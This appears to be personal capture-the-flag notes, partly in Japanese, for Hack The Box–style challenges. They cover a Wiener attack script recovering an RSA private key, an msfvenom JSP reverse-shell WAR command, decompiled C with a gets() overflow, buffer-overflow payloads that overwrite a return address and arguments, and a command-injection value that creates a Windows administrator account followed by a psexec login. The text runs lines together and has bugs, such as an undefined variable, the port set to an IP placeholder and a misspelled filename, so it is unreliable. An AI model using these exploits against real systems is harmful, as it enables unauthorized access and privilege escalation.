from Crypto.PublicKey import RSA
pubkey = RSA.importKey(open("key.pub").read())
e = pubkey.e
n = pubkey.n
print("e :", e)
print("n :", n)
これで e, n を計算する. e が巨大なので以下のように攻撃する
import owiener
from Crypto.Util.number import *
e = 68180928631284147212820507192605734632035524131139938618069575375591806315288775310503696874509130847529572462608728019290710149661300246138036579342079580434777344111245495187927881132138357958744974243365962204835089753987667395511682829391276714359582055290140617797814443530797154040685978229936907206605
n = 573177824579630911668469272712547865443556654086190104722795509756891670023259031275433509121481030331598569379383505928315495462888788593695945321417676298471525243254143375622365552296949413920679290535717172319562064308937342567483690486592868352763021360051776130919666984258847567032959931761686072492923
d = owiener.attack(e, n)
if d is None:
print("Failed")
else:
print("d={}".format(d))
with open('flag.enc', 'rb') as ct:
sc = bytes_to_long(ct.read())
plain = pow(c, d, n)
print(long_to_bytes(plain).strip())
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war でリバースシェルファイルを生成/revshell/ にアクセスtype *void vuln(void)
{
char local_bc [180];
gets(local_bc);
puts(local_bc);
return;
}
{
char local_50 [64];
FILE *local_10;
local_10 = fopen("flag.txt","r");
if (local_10 != (FILE *)0x0) {
fgets(local_50,0x40,local_10);
if ((param_1 == -0x21524111) && (param_2 == -0x3f212ff3)) {
printf(local_50);
}
return;
}
puts("Hurry up and try in on server side.");
/* WARNING: Subroutine does not return */
exit(0);
}
pattern_offset 0x41417741python3 -c "import sys; sys.stdout.buffer.write(b'A'*188+b'\\xe2\\x91\\x04\\x08')" > exploit.txtr < exploti.txtpython3 -c "import sys; sys.stdout.buffer.write(b'A'*188+b'\\xe2\\x91\\x04\\x08'+b'DUMB\\xef\\xbe\\xad\\xde\\x0d\\xd0\\xde\\xc0')" > exploit.txtabc.txt | net user htb abc123! /add ; net localgroup administrators htb /addpsexec.py htb:'abc123!'@ip